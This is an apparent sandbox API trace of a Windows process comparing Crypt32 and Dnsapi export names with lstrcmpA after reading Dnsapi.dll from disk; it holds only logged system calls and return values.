(lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0132.137] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0132.138] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0132.138] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0132.138] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0132.138] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0132.138] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0132.138] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0132.138] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.138] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0132.138] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0132.138] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0132.138] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0132.138] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0132.138] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0132.138] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0132.138] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0132.138] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0132.138] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0132.139] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.139] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0132.139] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0132.139] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0132.139] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0132.140] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0132.140] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0132.140] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0132.141] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0132.141] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0132.141] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0132.141] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0132.141] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0132.141] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0132.141] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0132.142] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0132.142] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0132.142] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0132.142] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0132.142] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0132.142] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0132.142] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0132.142] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0132.142] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0132.143] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0132.143] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0132.143] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0132.143] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0132.143] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0132.143] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0132.144] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0132.144] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0132.144] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0132.144] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0132.144] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0132.144] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0132.144] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0132.144] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0132.144] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0132.144] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0132.144] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0132.144] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0132.145] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0132.145] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0132.146] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0132.159] GetProcessHeap () returned 0x460000 [0132.159] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4075040 | out: hHeap=0x460000) returned 1 [0132.326] GetProcessHeap () returned 0x460000 [0132.326] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x10) returned 0x479030 [0132.326] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0132.339] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0132.339] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0132.339] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0132.339] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0132.339] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0132.339] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0132.339] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0132.339] GetProcessHeap () returned 0x460000 [0132.339] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0xa7b88) returned 0x39ed010 [0132.341] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0132.341] ReadFile (in: hFile=0x17c, lpBuffer=0x39ed010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x39ed010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0132.354] CloseHandle (hObject=0x17c) returned 1 [0132.355] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0132.355] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.355] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0132.355] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.355] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.355] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0132.355] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.355] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.355] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0132.355] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0132.355] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.355] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.355] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0132.355] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0132.355] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0132.355] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.356] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.356] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0132.356] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0132.356] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.356] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0132.356] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.356] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.356] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0132.356] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0132.356] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0132.356] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0132.356] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0132.356] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0132.356] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0132.356] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 